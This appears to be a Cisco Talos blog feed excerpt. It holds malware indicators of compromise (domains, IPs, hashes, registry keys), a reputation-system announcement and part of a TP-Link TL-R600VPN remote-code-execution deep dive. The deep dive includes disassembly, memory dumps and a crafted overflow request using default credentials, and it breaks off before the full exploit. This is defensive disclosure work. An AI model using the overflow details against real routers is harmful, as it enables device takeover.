maliciousnessce-cloud[.]comFiles and or directories created%LocalAppData%\Temp\hfdfjdk.exe%LocalAppData%\Temp\ddjienn.exeFile Hashes0008e3366cdb87658cde4f85f0e5741be774af2694012c5f8502c1d51759dee20b9fbbdcc9efc61347e0f0c483098d42ec98a6111a8009e5e5ff1447a82e16871af0f85fde6d7365d4a97557f244cd95138a9803c2761d224fccc0eb0b4ad98e1f6e5f75292636c7188d6f9cdcaa7597e0c251a3be8ce984488d68914f7ec9df26b32472bb1a256a74573ec41e62fd871bb4ea756e4e8d57a941a032f6f405cd285311d3a4d8608b94d4b3cccf3b9af094b5cdb51f7f92820b3b5bda8252137d31db2340ffd8138aa3edaaa8029a30ea69a7e15ddbc1305f358c1478ff86f5203cac1b87633da57b21fc38fc0da4f861e1dce3f8e48a2ced1824466da0b960493ef053f471053ead09f9b6dd0e54d13d64c83b5cb8141a8bece7acc66b61cca7429612f20949951f879009fd9843668237baf3aaebd55c645f30e4f08d12e20343c983dc9afe5727c47415c4a49ae29ea9ecc0ee902dc1918a9b5b9717f29e544e57fa6fb7d6ba5604b731123416a1c0f57802c4f2f4b639e1cef7734b14156c4e7249b5bab1568c6f288313c0fae32350aaa909cae234618a5cf2d63a55b9b0505bfa3c9c8e636aea732304b35f433d2293b0d0551c838a1b92f1c3f5fe7c7b5914cd64a76b00d7959492292242ddbf42db9664a12f28aa42ee55c9d1a331c560d0b3f876b5e3e71a670dcfe60e42fef400122b74c63918fc77a35b31acdf93653d6a96f4df49dc81a7cf2093cc622ebbeedd1a5e7298f61cc7227e8757aa5068f21b90a6486f1288e88f5e00fe69bb35dba3fadba68212c226d4661d6cd6e26ea9adfb2dd8d038803708173b88f366d79a8de500268f988f9d34a7717ae5d37266abbcf661e5648958d321114eadd09b05fa00cf7ba67610fbcc97cf5d809478d18fd4a7d66bd3c6c7b7a6b962f115a1059d7587e933b295621ee4b46813ef83c355f8cc2eb5f2381bfdbfa92db493891b2d08519d575e6a27e677cc60b1e183fb58f507b34a716b4e2a7b7edfcd184d64ec7577e2fe2c4cf26aaf2ab2ec468d59f4516f1d894e8b52ec3f4ed5d5ee0e0bbacfc3e51078a9209641e5c0bc02a0adfc3962b66d010da50d5fe1821b5a0cdbd85d98b03914655d269eccac44a2Coverage Screenshots of DetectionAMPThreatGridDoc.Malware.Sagent-6813871-0Indicators of CompromiseRegistry KeysN/AMutexesGlobal\552FFA80-3393-423d-8671-7BA046BB5906Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500Local\10MU_ACB10_S-1-5-5-0-57527Local\10MU_ACBPIDS_S-1-5-5-0-57527Local\MSCTF.Asm.MutexDefault1IP Addresses contacted by malware. Does not indicate maliciousnessN/ADomain Names contacted by malware. Does not indicate maliciousnesswww[.]richmondchamber[.]commadisonda[.]comcarminewarren[.]comchefshots[.]comcarriedavenport[.]comezpullonline[.]comFiles and or directories created%TEMP%\cFi.exe%LocalAppData%\Temp\lhfpz4cu.e3t.ps1%LocalAppData%\Temp\nxli3mbc.5ex.psm1File Hashes15c651628f4ccd80f1d6ff52a3464610cd9f7fe31ffcc332c15bb4abaa5a3486184ccc288232c76b5589ec0c6aeb280c934a5ad35c0c7155146d71030a040b4020d9a0f8fe27a43d9d99fd593c8d8af9b9799172c5b7179aa5a8cd2219de3b28210999842efd1221eb1973f2f18bdc8e8764ee19bba2680ac931edb357c72c29219520e560a9eb432aba9d319c3c959ff9fe3f4a3ed9eb7f34ff13d1f8fdeaa12ad4db5a367762fcde6ddaffc4159f16f82c15d0af81b17d445327acfdc896ed2ce7330a70040737397b483674680e27bcbdc67390dc64df11319539f15d4c793382c6cad4e8edd4f9423bfb6a7c0b2404386274280b9dbc09da6b40c3a976c037e0df1c725974d8842dbfd1c97c2808174bb13507008056d71acf5dcb16be863ca90d5bcf6aa92241dbfd3974542febbf325d25458643f2705fa712334452133fb6a4110c75a5c207da5997ed9b61fa0987d505bcb64aefad0676b1403fcbf64aa3fa1ef3642be02826ef9466eaf90427857dcdaaca6b7086b842527376f6fa4acbd8ebac5a1cfcb72aad7e5f1ff3b21d2541a931964a07de2a50bcb93251214b122ed996a80e03a2056abfc84a875b6c3cf2f02081f8546fe62ba9308a8e5857b90075a2a9821278a1ce760e5fd36f35f5ff5e768bef60f04aa4ac3741bc9d58503078fa335ae31c9c405e1ae21f9784a8b1fa397481289fbd387549d1d85758972ab31449176f9d62c6b35bcd63843cbeeb099b374e56b2c1cda373fb880b7bb379b42a8c970753eb37ecfd9e33fc758a9e24cd72594e1463b967552884d7807a8434cc34fb0b2875b8a8edbad637e29225288e8400c58317d6e50a93a2c78d10a6a99658759428cc5ab65baf57aee16ab607c23e2fb779e60450883aceb3934acd0d0bb2e9dd8c533594fc5b883a5542a7cbfc967a64243810124ae1193d95329196e424d530c8d1871241a630b2bebaf7d7c2ceeda21e1d5634f6fdd7219aaeb10b1fa88e535d1c4d1b4313c0423173489c9e6b90f1922cd86df0c2c3169dae1c9ef8a1bad9c6d708cef1e3f156eb634f406af397c55fca0fd3763311c2a50bbe414048cadb53c22770c78fdae9ac730249693ca7d46df239732938b3f1Coverage Screenshots of DetectionAMPThreatGridUmbrellaMalwareWin.Virus.Sality-6814419-0Indicators of CompromiseRegistry Keys<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: Hidden<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: AntiVirusOverride<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: AntiVirusDisableNotify<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: FirewallDisableNotify<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: FirewallOverride<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: UpdatesDisableNotify<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: UacDisableNotify<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC Value Name: AntiVirusOverride<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC Value Name: AntiVirusDisableNotify<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC Value Name: FirewallDisableNotify<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC Value Name: FirewallOverride<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC Value Name: UpdatesDisableNotify<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC Value Name: UacDisableNotify<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLUA<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: EnableFirewall<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: DoNotAllowExceptions<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: DisableNotifications<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007 Value Name: -757413758<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007 Value Name: 1011363011<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007 Value Name: -1514827516<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A3_0<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A4_0<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT Value Name: AlternateShell<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A3_1<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A4_1<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007 Value Name: 1768776769<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007 Value Name: 253949253<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007 Value Name: 2022726022<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007 Value Name: -503464505<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A2_2<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A1_0<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A2_0<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A1_1<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A2_1<HKCU>\SOFTWARE\AASPPAPMMXKVS Value Name: A1_2MutexesDBWinMutexuxJLpe1mdlkjsow832jsxXscx3cxcfdlf89dlsdIP Addresses contacted by malware. Does not indicate maliciousness206[.]189[.]61[.]126195[.]38[.]137[.]100213[.]202[.]229[.]103217[.]74[.]65[.]23217[.]74[.]76[.]12991[.]142[.]252[.]2669[.]172[.]201[.]15394[.]73[.]145[.]239173[.]193[.]19[.]14185[.]64[.]219[.]55[.]101[.]0[.]4449[.]50[.]8[.]31103[.]11[.]74[.]25173[.]0[.]143[.]204107[.]180[.]27[.]158103[.]224[.]182[.]24646[.]30[.]215[.]173Domain Names contacted by malware. Does not indicate maliciousnesswww[.]litespeedtech[.]compelcpawel[.]fm[.]interia[.]plwww[.]interia[.]plchicostara[.]comdewpoint-eg[.]comsuewyllie[.]comwww[.]bluecubecreatives[.]com724hizmetgrup[.]comyavuztuncil[.]ya[.]funpic[.]dewww[.]ceylanogullari[.]comcevatpasa[.]compracenadoma[.]wz[.]cztehnik-unggul[.]comphilanthrope[.]inwww[.]katenilsson[.]dkwww[.]best-lab[.]orgksaxl[.]comFiles and or directories created%System16%.ini%AppData%\Microsoft\Windows\Cookies\70QUCKJE.txt%AppData%\Microsoft\Windows\Cookies\OMAMI620.txt%AppData%\Microsoft\Windows\Cookies\XTNNC6UJ.txt%AppData%\Microsoft\Windows\Cookies\502SJT1F.txt%LocalAppData%\Temp\huies.exe%LocalAppData%\Temp\yjoj.exe\osipby.exe\xcmjc.exe%LocalAppData%\Temp\dnbaex.exe%LocalAppData%\Temp\whprwx.exe%LocalAppData%\Temp\wingahupx.exe%LocalAppData%\Temp\winuarv.exe%LocalAppData%\Temp\wlpilw.exe%LocalAppData%\Temp\ccwus.exe%LocalAppData%\Temp\uhmeo.exe%LocalAppData%\Temp\winauaepw.exe%LocalAppData%\Temp\winkwskn.exe%LocalAppData%\Temp\winltmrtj.exe\doxioa.exe\wbpi.exeFile Hashes02e195243af5923dae171d824b63a3d25a2538bc596a971273eb30b0a920b9e503232668bd0c47073066f155ac5577b0240fcff40eafac864adef86694006e4303bc456b9c91607a9ace1f4d8121d28f51ea3177bc2198fc3a1d76aab20b3620049d7d3d22c12f592379446b2ebb2cd2c894422379421afd4c77986a293760ed06e4245cf5a76061587820f25a5d019663b63cca431e9bb43095d6c09b25a3ea091eb9a5e513328d93d4e46884a210464ebbf3da71be68704bfd3bb00a8427240a8bd011f75fc337eba89d7aa95f293999ca5aa086357abe96555266d952b8830c0999de8b07c0e231326c88f991d068f6d56d9e85a2c386a09ccf2eb8be9ebf0ec786687795fff9476658ca7b29a04949025cdb3fae672a6ae071520313f43c109ec982b35185df989ef3558f704648ff4e4b9c307fba80d238dc546a5ff8d210c2740264a991ddd1bc1058975565eaa871803647805048c8132d169d34f5ca11b75d4bb7cdc3938d884da59da1885e70b8bc995bbf528ffd1c02d5876214f813971272ef6b82c6b5ef9de3eb33f2dc439048c4eacd388faf2de37d89d25bb115b9de1e80e24edb459847e427edbee34734d9950db2c84f30175ba46eb5d208168fce02cad1cfd3ac578f3ccfb023c6ea76f8c402ab160f0271863c66279af01692102392f7d3552307ae0b1e081b862650272d22a3823134cc9a2bfc6866c316e8fc998564cd4272795782a371fad13fca160f9427f85e0a8591d56c9a52481a93a65e01aecd981c300f7877d51c1b4907fccb4acced53c3e70bb7c1884e611c2479ad95ad5ec5944d10fc4222b0f7b9c40e4f3e940515c18773205a6129c81c7a9720df7186f3354799f5f7b17139e20d8c9233ef796c1f8a9a4a61a3eb731f747322ea42c2d20d19d3f0b9b2afe1f143910006163a6f08d27b97b2927ff72012be50bc465db1fee01bcd1183590e9d22a1fb3105efa1005f9da81adc7a5c238f6f0376a19f92bfb2e616bac4da36f5eb922e2e93bba8bb61d0a0dfa18f18252fe2be1234ed2028a28650daa61a2a5e90f40598c52b97226d67c8e701b97b256fd9777738e64c2dc9279a398a24cc2382d95eb94d760d081fee71d8daa32bCoverage Screenshots of DetectionAMPThreatGridUmbrellaWin.Packed.Johnnie-6814043-0Indicators of CompromiseRegistry Keys<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: internat.exe<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST Value Name: C:\Users\Administrator\AppData\Roaming\Window Updates\winupdt2.exe<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST Value Name: C:\Users\Administrator\AppData\Roaming\Windows Updater.exe<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: WinUpdt<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID\ID Value Name: DZ85WJDHN3<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL\DATE Value Name: DZ85WJDHN3MutexesDZ85WJDHN3IP Addresses contacted by malware. Does not indicate maliciousness204[.]95[.]99[.]61Domain Names contacted by malware. Does not indicate maliciousnesshavefunnuke[.]servequake[.]comFiles and or directories created%AppData%\Window Updates\winupdt2.exe%AppData%\Window Updates\winupdt2.txt%AppData%\Windows Updater.exe%AppData%\data.dat%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kAZSM.bat%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kAZSM.txt%AppData%\Window Updates\%AppData%\Window Updates\winupdt2.exe%AppData%\Window Updates\winupdt2.txt%AppData%\Window Updates\winupdt2.exe%AppData%\Window Updates\winupdt2.txt%AppData%\Windows Updater.exe%AppData%\data.dat%AppData%\Windows Updater.exe%AppData%\data.dat%LocalAppData%\Temp\AlgRz.bat%LocalAppData%\Temp\AlgRz.txt%LocalAppData%\Temp\AlgRz.bat%LocalAppData%\Temp\AlgRz.txtFile Hashes1091dadfa59fe9530292e18818036f6e8ea754664a29665427f357f5ab75d4e12d00dce46e197f8fb90ee6ac49d4a671fbf4a5a52965021df8b18f787974b8e53086d7d8c8d73a9d6e010edef5be6741be609120c7a6d5500b75d38157c65b4030e11e19fae9d52645c3d39f2988880cc7a92361cfd4cc16887efc2533eccaa33c5550e2547c2b34dd54755a102c118884cc5eade31a455240f6d728f1fa142e42649ce0c2c923fc667921078c999d6bf0f83d41d5cff1fca4f3bcbab825609f468a2974e88fdbd3e43e9bb1fbb4e706e83215ea7af6d792ce818173d7eb91a24a835d5e7c4293b6ac0fcd277051c6718397a425ae0b9e87f836927b5aaf5bfc542e1acae7a25e27803e5e48ef2bf6bad70edc79d1d0861d420c812bc41000d954842caa37882cfc0aa7d565f4d2d1c6c77b9af259ae051c380fe08337576cd0795dd2ce39784bafcbda7b5fd364f7ca70ea9bcc9ea87cc9b46a4d8c0cf320b6a94bc5d6fa3117328c19a9da7325a788ffc89ad481e63e761e875f10ee1910bcaa75c45c4b182f44f265665905956827474e1da5fb002ced185cf679830772e3cb5698b07a75086cb1aaddff5a451b3dfbcf07407ba0da9376cfe69a51c2b38bd4825d1956ccf52a7e8043f28af9f2942e08c16bcee2785c51717047c89d1a92da665cdf12e4e77c8383c37497e36f34bd5794273df879109774065bfbbec40fec0638880ff60664c2ffe5417342297f90b9df3df8b7e0c063387f8eb69f633bef405428d8e6f3bc8db642f36192e9684982ff4a6fa507259e8a63b832a72f8dCoverage Screenshots of DetectionAMPThreatGridWin.Downloader.Powershell-6810733-0Indicators of CompromiseRegistry Keys<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS Value Name: Start<HKLM>\SOFTWARE\MICROSOFT\TRACING\POWERSHELL_RASMANCS Value Name: EnableFileTracingMutexesRasPbFileIP Addresses contacted by malware. Does not indicate maliciousness92[.]63[.]197[.]48Domain Names contacted by malware. Does not indicate maliciousnessslpsrgpsrhojifdij[.]ruFiles and or directories created%LocalAppData%\Temp\979574639568794.exe%LocalAppData%\Temp\jqlrdsf3.aw2.ps1%LocalAppData%\Temp\qg25nwiz.upp.psm1File Hashes08523df3d1943edaeddde63d82ef9883c647fa0e32e6dd38b6ea132e5e67a9380ece442fd0f210407f128e1cd0c32fcac42f18a7490be62f6ef445725ec6c08e14eb1abed6c28c1b3f34d15f663cbad4ccd35f586e72dd6bdb68cc2295f46ed415d55efbcadf80890653db8d710f5dbd8af0a15aa02174287864b76dbac711e24525956fa304c39359981f0a0541985395b52f33bcb3bffba82576abad5d83da4e60c907247bb3dc206de6c9a59fcd2dc108cd0f7e3109a41eed3b29b0e2dc6b61c1822c8e0feeff2e35a6f821d634a9306c9c6fcebce3459a43c9eb3e482b047ee9421633c1cf45b855551025d7c8b5eccca16a32a569ef62265b067e142d6582b4b7bb6a74ac688b563543f1720bdbe2c91319e9eede5c4b9fd0979c99dd03864586f404a45319aa1b921f460f6b672b0f0f384442366dcca7a9b8deeb0cfe8a48ab287acb6260e4ec3d1e59631d8ec91f3a8bf848dc5f1e97657fd2be5112b41d6173c4a345c945451a444954a44569984fe4695047155e8f5328fa0fa0b5bc2f6a4105f310dde0bd1ebc80e0453f6cf660d55414ee8638eaba339e372696e23b6494912529d6339e9922048214a2dc0162489e33a3c1750c99348865b68ee5cef04fdb9f9a47979db41eb80e5fc148b2b374c6ad28bd831283ac538e9c77f92034a3417a6f0506dc7392fd745731be810b21f9dffb4e3b6b0b1b794f45fbfc378a5892438ed05fcbdfc422eb4de13f1cab8fd30385c96c19532a9c974ee1Coverage Screenshots of DetectionAMPThreatGridUmbrella […]

  • Cisco Talos’ new reputation dispute system
    by noreply@blogger.com (Jonathan Munshaw) on January 18, 2019 at 6:24 pm

    We know users have been waiting for this feature for a while, and we are here to say: It’s ready.  Cisco Talos’ new reputation system rolled out Jan. 14 on TalosIntelligence.com. We have been working on this change since the rollout was initially announced this past summer.Starting today, all users who wish to file a reputation dispute with us will need to log in with a free Cisco Connection Online ID (CCID) and head to the Talos Reputation Center. There, users can look up the reputation of any IP or domain to see all current information Talos has on that entry. Sites that customers feel are miscategorized can also be disputed on this page. This page also contains information about who the highest volume senders are and sort that data by network owner and country.Additionally, users who believe their site has been inappropriately blacklisted can file a dispute, which will flow through the appropriate channels to address their concerns.The new system closely links the dispute ticketing system and our analysts to create greater interactivity between analysts and customers. Users simply log into TalosIntelligence.com with their CCID to see the resolution of any dispute they’ve ever filed through this new system.Our new reputation dispute system merges several sites, including Talosintelligence.com, securityhub.cisco.com and senderbase.org. We hope this new setup provides an easier, streamlined process for our customers and users to file and track disputes with us.  Check out the new Reputation and Categorization Support page now! […]

  • Vulnerability Deep Dive: TP-Link TL-R600VPN remote code execution vulnerabilities
    by noreply@blogger.com (William Largent) on January 18, 2019 at 4:33 pm

    Vulnerability discovery and research by Jared Rittle and Carl Hurd of Cisco Talos.IntroductionTP-Link recently patched three vulnerabilities in their TL-R600VPN gigabit broadband VPN router, firmware version 1.3.0. Cisco Talos publicly disclosed these issues after working with TP-Link to ensure that a patch was available. Now that a fix is out there, we want to take the time to dive into the inner workings of these vulnerabilities and show the approach we took with our proof-of-concept code.BackgroundThe TP-Link TL-R600VPN is a five-port small office/home office (SOHO) router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. Except for a few proprietary instructions for handling unaligned load and store operations, these two instruction sets are essentially the same. The instructions that are not included in Lexra are LWL, SWL, LWR, and SWR. These proprietary instructions are often used when compiling a program for the more common MIPS-1 architecture and cause a segfault when encountered in Lexra. The knowledge of this key difference is imperative to assembling working code for the target.For more information about Lexra MIPS and its differences with the MIPS-1 architecture, refer to ‘The Lexra Story’ and the MIPS-1 patent filing.ReconUnderstanding the vulnerabilityThe device contains a vulnerability in the way that the HTTP server handles requests to the /fs/ directory, allowing an authenticated attacker to remotely execute code on the device.When accessing any of the following pages in the /fs/ directory, the application incorrectly parses the passed HTTP header.http://<router_ip>/fs/helphttp://<router_ip>/fs/imageshttp://<router_ip>/fs/frameshttp://<router_ip>/fs/dynaformhttp://<router_ip>/fs/localiztion (NOTE: this is not a typo)In the function ‘httpGetMimeTypeByFileName’, the web server attempts to parse the file extension of the requested page to determine its mime type. During this processing, the server uses a strlen() call to determine the length of the requested page name, seeks to the end of that heap-allocated string, and reads the file extension backwards until it encounters a period (0x2e).## calculates the length of the uri and seeks to the end#LOAD:00425CDC loc_425CDC:LOAD:00425CDC                 la $t9, strlenLOAD:00425CE0                 sw $zero, 0x38+var_20($sp)LOAD:00425CE4                 jalr $t9 ; strlenLOAD:00425CE8                 sh $zero, 0x38+var_1C($sp)LOAD:00425CEC                 addu $s0, $v0# looks for a period at the current index and break out when foundLOAD:00425CF0                 li $v0, 0x2E            LOAD:00425CF4                 lbu $v1, 0($s0)LOAD:00425CF8                 lw $gp, 0x38+var_28($sp)LOAD:00425CFC                 beq $v1, $v0, loc_425D14LOAD:00425D00                 li $v1, 0b101110LOAD:00425D04# loop backwards until a period is found, loading the character into $s0LOAD:00425D04 loc_425D04:                                                LOAD:00425D04                 addiu $s0, -1LOAD:00425D08                 lbu $v0, 0($s0)             LOAD:00425D0C                 bne $v0, $v1, loc_425D04LOAD:00425D10                 nopThere should always be an extension on the requested page, preventing the vulnerable case from occurring. This can be seen in the GDB strings output below for the non-malicious page /web/dynaform/css_main.css where the file extension ‘css’ will be parsed out.0x67a170:        “/web/dynaform/css_main.css”0x67a18b:        “46YWRtaW4=”0x67a196:        “\nConnection: close\r\n\r\nWRtaW4=\r\nConnection: close\r\n\r\n6YWRtaW4=\r\nConnection: close\r\n\r\n46YWRtaW4=\r\nConnection: close\r\n\r\ntaW4=\r\nConnection: close\r\n\r\n http://192.168.0.1/\r\nAuthorization: Basic YWRtaW46YWRt”…0x67a25e:        “aW4=\r\nConnection: close\r\n\r\nnnection: close\r\n\r\n”0x67a28d:        “”0x67a28e:        “”0x67a28f:        “”0x67a290:        “”If, however, we request one of the vulnerable pages we can see that the URI that gets parsed does not contain a period (0x2e). Due to this, the application will continue to search backwards until a period is reached. In this case, there is not a period between the URI being parsed and the raw GET request data stored earlier on the heap (shown below at address 0x679960), allowing us to seek backwards into our payload. This can be seen at address 0x67a170 in the GDB strings output below for the malicious page /fs/help where no file extension is being parsed….0x679960:        “/fs/help”0x679969:        “elp”0x67996d:        “HTTP/1.1″0x679976:        “\n”0x679978:        “ost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q”…0x679a40:        “=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n”                                                   0x679ac1:        “”0x679ac2:        “”0x679ac3:        “”0x679ac4:        “”0x679ac5:        “”…0x67a165:        “gp”0x67a169:        “”0x67a16a:        “\b”0x67a16c:        “”0x67a16d:        “”0x67a16e:        “”0x67a16f:        “”0x67a170:        “/web/help”0x67a17a:        “secure-Requests”0x67a18a:        ” 1″0x67a18d:        “\n\r\nure-Requests: 1\r\n\r\nclose\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUpgrade-Insecure-Requests: 1\r\n\r\n\nUpgrade-Insecure-Requests: 1\r\n\r\nsic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\na”…0x67a255:        “tion: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\nure-Requests: 1\r\n\r\n”0x67a2ba:        “”0x67a2bb:        “”0x67a2bc:        “”…When a period is encountered, in either the expected file extension or the vulnerable case, the extracted string is processed by the toUpper() function, character by character, in the loop. The result of this operation is then written to a stack-based buffer by a store byte instruction. This can be seen in the instructions pulled from the aforementioned loop, which can be seen below.## loads parsed data onto stack via a store byte call from $s0 register#LOAD:00425D20 loc_425D20:LOAD:00425D20                 lbu $a0, 0($a0)# returns an uppercase version of the character where possibleLOAD:00425D24                 jalr $t9 ; toUpper             LOAD:00425D28                 nop# $gp references $s2, the place for the next char on the stack bufferLOAD:00425D2C                 lw $gp, 0x38+var_28($sp)             # stores the character into $s2LOAD:00425D30                 sb $v0, 0($s2)             LOAD:00425D34# calculates the length of the entire user-supplied stringLOAD:00425D34 loc_425D34:LOAD:00425D34                 la $t9, strlenLOAD:00425D38                 jalr $t9 ; strlen                     # place a pointer to the parsed data into arg0LOAD:00425D3C                 move $a0, $s0             LOAD:00425D40                 addiu $v1, $sp, 0x38+var_20LOAD:00425D44                 lw $gp, 0x38+var_28($sp)LOAD:00425D48                 sltu $v0, $s1, $v0LOAD:00425D4C                 addu $a0, $s0, $s1LOAD:00425D50                 addu $s2, $v1, $s1LOAD:00425D54                 la $t9, toupperThe program continues execution until it reaches the httpGetMimeTypeByFileName function epilogue where the return address and five registers are loaded from their saved values on the stack. When the vulnerability is being exploited, these saved values have been overwritten from their normal data to contain the addresses of the gadgets described later.## registers get overwritten with saved values on the stack#LOAD:00425DB4 loc_425DB4:LOAD:00425DB4LOAD:00425DB4                 lw $ra, 0x38+var_4($sp)LOAD:00425DB8                 lw $s4, 0x38+var_8($sp)LOAD:00425DBC                 lw $s3, 0x38+var_C($sp)LOAD:00425DC0                 lw $s2, 0x38+var_10($sp)LOAD:00425DC4                 lw $s1, 0x38+var_14($sp)LOAD:00425DC8                 lw $s0, 0x38+var_18($sp)LOAD:00425DCC                 jr $ra             LOAD:00425DD0                 addiu $sp, 0x38LOAD:00425DD0  # End of function httpGetMimeTypeByFileNameAt this point in the function epilogue, the loop copying data to a set buffer has overwritten the original data on the stack. By popping the data off of the stack that the program expects to be unmodified, the user gains control of the return address. This also means the user has the ability to remotely execute code in the context of the HTTPD process.toUpper() filterDuring the initial parsing of the HTTP header, the device iterates over each byte searching for a period (0x2e) and building a buffer. After a period is encountered, the buffer is passed to a toUpper() call, converting each ASCII character in the buffer to its uppercase equivalent.LOAD:00425D20 loc_425D20:LOAD:00425D20                 lbu $a0, 0($a0)# returns an upper case version of the character where possibleLOAD:00425D24                 jalr $t9 ; toUpper             LOAD:00425D28                 nopThis creates a problem when attempting to send shellcode via the HTTP header, as there is no way to avoid the toUpper() call, preventing the use of any lowercase characters. Take the GET request below, for example.GET /fs/help HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaContent-Length: 2Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46YWRtaW4=Connection: keep-aliveUpgrade-Insecure-Requests: 1Content-Length: 4We can see that the ‘a’ characters (0x61) in our header have been converted to their uppercase version (0x41) by looking at the registers just before the final jump in the httpGetMimeTypeByFileName function epilogue is executed.(GDB) i r i r          zero at       v0 v1 a0       a1 a2 a3 R0   00000000 10000400 00514004 00000035 7dfff821 0051432d 01010101 80808080            t0 t1      t2 t3 